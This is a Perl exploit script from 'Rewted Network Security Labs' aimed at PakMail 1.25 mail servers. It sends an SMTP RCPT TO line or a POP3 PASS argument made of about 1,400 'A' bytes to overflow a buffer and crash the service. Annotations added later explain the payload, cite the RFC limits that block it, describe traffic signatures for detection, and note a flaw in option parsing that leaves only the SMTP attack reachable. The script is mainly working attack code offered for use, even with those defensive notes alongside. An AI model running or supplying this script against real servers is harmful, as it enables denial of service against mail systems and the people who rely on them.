#!/usr/bin/perl
################################################
# Rewted Network Security Labs www.rewted.org  #
#                                              #
# Exploits a buffer overrun on PakMail         #
# SMTP and POP3 servers.                       #
# Vulnerable version 1.25 and probably below.  #
# Vendor: www.pak.net                          #
#                                              #
# Exploited by slackee warminx@null.rewted.org #
################################################
#
# What the script does, as written:
#   * pakmail: opens TCP port 25 on the host given with -h, sends MAIL FROM
#     and then one RCPT TO whose local part is 1390 "A" characters, closes.
#   * pakpop: opens TCP port 110, sends "user test" and then a "pass"
#     argument of 1400 "A" characters, closes.
#   Neither routine sends HELO, reads the greeting or reads any reply, and
#   both end lines with a bare LF. The "Sent overflow" message therefore only
#   reports that the bytes were written, not what state the server is in.
#
# Defensive notes:
#   * Both arguments are far beyond the protocol limits: RFC 5321 caps an
#     SMTP command line at 512 octets and a local part at 64; RFC 1939 caps a
#     POP3 argument at 40 characters (RFC 2449 allows a 255-octet command
#     line). A server, filtering proxy or IDS rule that enforces those limits
#     rejects this input before it reaches the vulnerable parser.
#   * In logs or packet captures the traffic is a RCPT TO or PASS line of
#     well over a thousand identical bytes, sent immediately after connect.
#   * The header names 1.25 "and probably below" as affected; no fixed
#     version is stated here, so check the vendor's advisories for one.

use IO::Socket;
use Getopt::Std;

# NOTE(review): the spec 'h:t' gives -h a value but declares -t as a plain
# switch, so Getopt::Std stores 1 in $args{t} whatever follows it on the
# command line. As written, only the "== 1" (SMTP) branch below is reached.
getopts('h:t', \%args);

my $have_host = defined($args{h});
my $have_type = defined($args{t});

# Usage is printed only when BOTH options are absent; with exactly one of
# them the script falls through both tests and exits without output.
# The usage text is kept exactly as it appears in the listing (its line
# breaks and argument placeholders look lost in extraction -- unconfirmed).
unless ($have_host || $have_type) {
    print qq~Rewted Network Security Labs www.rewted.org\nUsage: $0 -h -t -h hostname to test bof -t server type to DoS (1 = SMTP) (2 = POP3) ~;
    exit;
}

if ($have_host && $have_type) {
    pakmail() if $args{t} == 1;
    pakpop()  if $args{t} == 2;
}

# SMTP case: one connection to port 25, an over-long RCPT TO local part.
# $victim, $denial and $socket are package globals (no strict, no my).
sub pakmail {
    $victim = $args{h};

    # 1390 filler bytes appended to the (initially empty) global.
    $denial .= "A" x 1390;

    $socket = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerAddr => $victim,
        PeerPort => "25",
    ) or die "Can't connect.\n";

    # Two separate writes, LF-terminated, no HELO and no reply handling.
    print {$socket} "MAIL FROM: test\@localhost\n";
    print {$socket} "RCPT TO: $denial\@localhost\n";

    print "\nSent overflow to $victim\n";
    close($socket);
}

# POP3 case: one connection to port 110, an over-long PASS argument.
sub pakpop {
    $victim = $args{h};

    # 1400 filler bytes appended to the same global used by pakmail.
    $denial .= "A" x 1400;

    $socket = IO::Socket::INET->new(
        Proto    => "tcp",
        PeerAddr => $victim,
        PeerPort => "110",
    ) or die "Can't connect.\n";

    # USER first, then the oversized PASS; replies are never read.
    print {$socket} "user test\n";
    print {$socket} "pass $denial\n";

    print "\nSent overflow to $victim\n";
    close($socket);
}

# Neither I or Rewted Network Security Labs is liable for usage of this script.
# This is for testing purposes only, use at your own risk.